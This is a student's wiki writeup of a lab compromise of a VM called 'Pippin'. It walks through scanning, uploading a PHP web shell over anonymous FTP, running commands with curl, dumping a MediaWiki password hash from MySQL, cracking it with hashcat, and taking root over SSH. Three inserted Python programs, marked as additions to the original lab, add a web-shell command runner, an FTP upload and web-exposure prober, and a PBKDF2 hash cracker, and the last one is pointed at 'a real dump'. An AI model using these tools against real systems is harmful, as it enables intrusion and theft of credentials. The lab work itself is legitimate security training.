Lab 7.1: Exploiting Pippin - morgan-hanrahan/Tech-Journal GitHub Wiki

Reflection

In this lab we examined a misconfigured system and learned different techniques to gain access to it. We also learned about the dangers of an insecure configuration and the consequences it can lead to. The primary error committed by Pippin's system administrator was running an anonymous FTP server that allows file uploads. This error allowed us to obtain control of the system while also exposing it to significantly greater risk. Another mistake was the reuse of passwords and the use of weak passwords. We were able to retrieve the password hash of the user Pippin from the MySQL database. This turned out to be the same password as the root user's, allowing us to get root access to the system. For this particular assignment, I was very unfamiliar with using FTP and needed assistance from one of the hint videos my instructor provided. After watching the video, I became more confident with FTP and was able to accomplish the rest of the tasks on my own.

Webshell Assignment

We started with a webshells assignment before diving into this lab. This task was quite simple, consisting of configuring a PHP web server with a web shell. For the final task of this assignment we were to curl the web server to get the IP address information and the current user, echo a ping command into a script.sh file, make the script executable, and run it. The command I used for this was:

curl 127.0.0.1:8090/simple-backdoor.php?cmd="ip+a;whoami;echo+'ping%20%2Dc%201%208.8.8.8'>script.sh;chmod+777+script.sh;./script.sh"
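As an added example that is not part of the original lab writeup or the course material, the Python helpers below build and decode the cmd= parameter for simple-backdoor.php and pull the command output out of the <pre> block the shell wraps it in. They assume the Kali copy of simple-backdoor.php, which runs system($_REQUEST['cmd']) and echoes the result between <pre> tags, and the lab's local PHP server address; the function names are mine.

```python
from html import unescape
from urllib.parse import unquote_plus, urlencode
import urllib.request

# Added example, not code from the lab or from the simple-backdoor.php author.
# Assumption: the target is the Kali /usr/share/webshells simple-backdoor.php,
# which does system($_REQUEST['cmd']) and prints the output inside <pre>...</pre>.

def webshell_url(base_url: str, cmd: str) -> str:
    """Build the GET URL, percent-encoding every shell metacharacter (';', "'", '>')
    so the command reaches PHP exactly as written instead of being hand-escaped."""
    return base_url + "?" + urlencode({"cmd": cmd})

def decode_cmd_param(raw: str) -> str:
    """Decode a hand-encoded cmd= value (the lab's '+' and '%20%2D' style)
    to show what system() will actually execute on the server."""
    return unquote_plus(raw)

def parse_backdoor_output(html: str) -> str:
    """Return the command output between the first <pre> and the last </pre>."""
    start = html.find("<pre>")
    end = html.rfind("</pre>")
    if start == -1 or end == -1:
        raise ValueError("no <pre> block in response; is this simple-backdoor.php?")
    return unescape(html[start + len("<pre>"):end]).strip()

def run(base_url: str, cmd: str, timeout: float = 10) -> str:
    """Execute cmd through the webshell and return its stdout (makes a network call)."""
    with urllib.request.urlopen(webshell_url(base_url, cmd), timeout=timeout) as resp:
        return parse_backdoor_output(resp.read().decode(errors="replace"))

# The lab's command chain written as a plain shell string; run() does the encoding.
LAB_CHAIN = "ip a;whoami;echo 'ping -c 1 8.8.8.8'>script.sh;chmod 777 script.sh;./script.sh"

if __name__ == "__main__":
    # Assumed address: the lab's local PHP server from the curl command above.
    print(run("http://127.0.0.1:8090/simple-backdoor.php", LAB_CHAIN))
```

Note that urlencode encodes the semicolons and quotes too, which the hand-written curl line relies on the shell and PHP leaving alone; decode_cmd_param on the lab's raw cmd= value shows the exact string system() receives.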

File Vulnerability Lab

Reconnaissance

To begin the reconnaissance, I first ran an nmap scan using the command: nmap -sV --open 10.0.5.25. This showed all the open ports on the target system along with their services and versions. I was able to see that vsftpd, OpenSSH, and Apache were running. I thought that FTP was an interesting find and that I might be able to use it to exploit the server. I also looked into how the services respond to client applications.

Gaining Access

The system was misconfigured to run an anonymous FTP server that allows file uploads. I connected with the command ftp -i 10.0.5.25 and logged in anonymously using the password password. Once I was on the FTP server I was able to upload my own test file, which I titled tEsT.txt, using the command put tEsT.txt.

Once I knew the test file uploaded correctly, I copied /usr/share/webshells/php/simple-backdoor.php into a file I named tEsT.php and uploaded it to the FTP server the same way as the test file. The copy and rename were done using the following commands:

- cp /usr/share/webshells/php/simple-backdoor.php .
- mv simple-backdoor.php tEsT.php

Requesting tEsT.php through the Apache server with a cmd parameter, as in the webshell assignment, gave me the output of the /etc/passwd file. In it I found four accounts of interest that had clearly been added by whoever installed the operating system. Looking back at the contents of the MediaWiki LocalSettings.php file, I saw that it contained the $wgDBpassword value. Using this password I was able to log in to the peregrin.took account.
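To check the misconfiguration itself rather than only exploit it, the following added example (mine, not from the journal) logs in anonymously with ftplib, tries to store a marker file, confirms it appears in the listing, and removes it again; it also probes whether the same filename is then served by Apache, which is what turns a writable anonymous FTP directory into remote code execution. The upload check takes the connection object as a parameter so the logic can be exercised without a live server; the host, web URL and function names are assumptions.

```python
import ftplib
import io
import urllib.error
import urllib.request

# Added example, not from the lab writeup. Marker name reuses the writeup's
# tEsT.txt; the host and web URL in __main__ are assumed from the lab.
MARKER_NAME = "tEsT.txt"

def anonymous_login(host: str, password: str = "password", timeout: float = 10) -> ftplib.FTP:
    """Connect and log in as 'anonymous'. A server configured for anonymous
    access accepts any password; the writeup used 'password'."""
    ftp = ftplib.FTP(host, timeout=timeout)
    ftp.login(user="anonymous", passwd=password)
    return ftp

def anonymous_upload_allowed(ftp, marker: str = MARKER_NAME) -> bool:
    """Return True if the current FTP directory accepts a STOR from this login.
    The marker is deleted afterwards when the server permits it."""
    try:
        ftp.storbinary("STOR " + marker, io.BytesIO(b"anonymous write test\n"))
    except ftplib.error_perm:          # 550 Permission denied, or similar
        return False
    listed = marker in ftp.nlst()
    try:
        ftp.delete(marker)
    except ftplib.error_perm:
        pass                           # write-only drop dirs often forbid DELE
    return listed

def served_over_http(base_url: str, name: str, timeout: float = 10) -> bool:
    """Probe whether a file dropped over FTP is reachable through the web server,
    i.e. whether the FTP directory sits inside the Apache document root."""
    try:
        with urllib.request.urlopen(base_url.rstrip("/") + "/" + name, timeout=timeout) as resp:
            return resp.status == 200
    except urllib.error.HTTPError:
        return False

if __name__ == "__main__":
    ftp = anonymous_login("10.0.5.25")                      # assumed lab target
    print("anonymous upload allowed:", anonymous_upload_allowed(ftp))
    # Leave a marker in place long enough to test web exposure, then clean up.
    ftp.storbinary("STOR " + MARKER_NAME, io.BytesIO(b"probe\n"))
    print("upload dir is web-exposed:", served_over_http("http://10.0.5.25", MARKER_NAME))
    ftp.delete(MARKER_NAME)
    ftp.quit()
```

If both checks return True, anything an anonymous client uploads (such as tEsT.php) executes as the web server user, which is the whole chain used in this lab.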

Next, I was determined to gain root access, so I looked into the MySQL database using mysql -u root -p. I found an interesting database titled mediawiki. Inside this database was a table titled user. From the user table I selected both user_name and user_password and found a password hash.

Then I created two files. testWords.txt consists of all the words in rockyou.txt that begin with a lowercase p, produced with the command: cat /usr/share/wordlists/rockyou.txt | grep '^p' >> testWords.txt. pipHash.txt contains the hash found in the user table in MySQL. With these files I ran the command: hashcat -m 12100 pipHash.txt -w4 -a0 testWords.txt (mode 12100 is PBKDF2-HMAC-SHA512, the algorithm behind MediaWiki's :pbkdf2:sha512 password hashes) in order to crack the password. From the cracking run I was able to determine the password was palentir. Using ssh root@10.0.5.25 I was able to ssh into the root account with the password I had just found.
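The hashcat step only works once the MediaWiki user_password value is in hashcat's 12100 format. The added Python example below (mine, not from the journal; the salt, resulting hash and wordlist are constructed for the example, not Pippin's real data) parses MediaWiki's :pbkdf2:sha512:rounds:length:salt:hash field, rewrites it as the sha512:rounds:salt:hash line that hashcat -m 12100 expects, and runs the same "words starting with p" dictionary check with hashlib so a candidate can be verified without hashcat. The MediaWiki and hashcat formats are as documented by those projects; the function names are mine.

```python
import base64
import hashlib
import hmac
from typing import Iterable, Optional

# Added example, not part of the lab writeup. Assumptions: MediaWiki's
# Pbkdf2Password stores ":pbkdf2:<algo>:<rounds>:<length>:<b64 salt>:<b64 hash>"
# with the salt base64-decoded before use; hashcat -m 12100 reads
# "sha512:<rounds>:<b64 salt>:<b64 hash>". Sample salt/wordlist are constructed.

def mediawiki_pbkdf2(password: str, salt: bytes, rounds: int = 30000,
                     length: int = 64, algo: str = "sha512") -> str:
    """Produce a MediaWiki-style ':pbkdf2:' user_password field (used here only
    to build a constructed sample; 30000 rounds is an assumed setting)."""
    dk = hashlib.pbkdf2_hmac(algo, password.encode(), salt, rounds, dklen=length)
    return ":pbkdf2:{}:{}:{}:{}:{}".format(
        algo, rounds, length,
        base64.b64encode(salt).decode(), base64.b64encode(dk).decode())

def parse_mediawiki_hash(field: str) -> dict:
    """Split the stored field into its parameters, decoding salt and hash."""
    parts = field.split(":")
    if len(parts) != 7 or parts[1] != "pbkdf2":
        raise ValueError("not a MediaWiki :pbkdf2: password field")
    _, _, algo, rounds, length, salt_b64, hash_b64 = parts
    return {"algo": algo, "rounds": int(rounds), "length": int(length),
            "salt": base64.b64decode(salt_b64), "hash": base64.b64decode(hash_b64),
            "salt_b64": salt_b64, "hash_b64": hash_b64}

def to_hashcat_12100(field: str) -> str:
    """Rewrite the field as the line to put in pipHash.txt for hashcat -m 12100."""
    p = parse_mediawiki_hash(field)
    if p["algo"] != "sha512":
        raise ValueError("hashcat -m 12100 is PBKDF2-HMAC-SHA512 only")
    return "sha512:{}:{}:{}".format(p["rounds"], p["salt_b64"], p["hash_b64"])

def check_password(field: str, candidate: str) -> bool:
    """Recompute PBKDF2 with the stored parameters and compare in constant time."""
    p = parse_mediawiki_hash(field)
    dk = hashlib.pbkdf2_hmac(p["algo"], candidate.encode(), p["salt"],
                             p["rounds"], dklen=p["length"])
    return hmac.compare_digest(dk, p["hash"])

def crack(field: str, wordlist: Iterable[str], prefix: str = "") -> Optional[str]:
    """Dictionary attack mirroring grep '^p' rockyou.txt | hashcat -a 0:
    keep only words with the given prefix and return the first one that verifies."""
    for word in wordlist:
        word = word.rstrip("\n")
        if prefix and not word.startswith(prefix):
            continue
        if check_password(field, word):
            return word
    return None

# Constructed sample: a fixed salt and the lab's recovered password, so the
# field is a valid MediaWiki hash but not the one pulled from Pippin's database.
SAMPLE_SALT = b"0123456789abcdef"
SAMPLE_FIELD = mediawiki_pbkdf2("palentir", SAMPLE_SALT)
SAMPLE_WORDLIST = ["root\n", "password\n", "pippin\n", "palantir\n", "peregrin\n", "palentir\n"]

if __name__ == "__main__":
    print("pipHash.txt line:", to_hashcat_12100(SAMPLE_FIELD))
    print("cracked:", crack(SAMPLE_FIELD, SAMPLE_WORDLIST, prefix="p"))
```

Against a real dump, read the user_password column out of the mediawiki.user table, feed it to to_hashcat_12100, and use that line in pipHash.txt; check_password is handy to confirm a hashcat result before trying it over SSH.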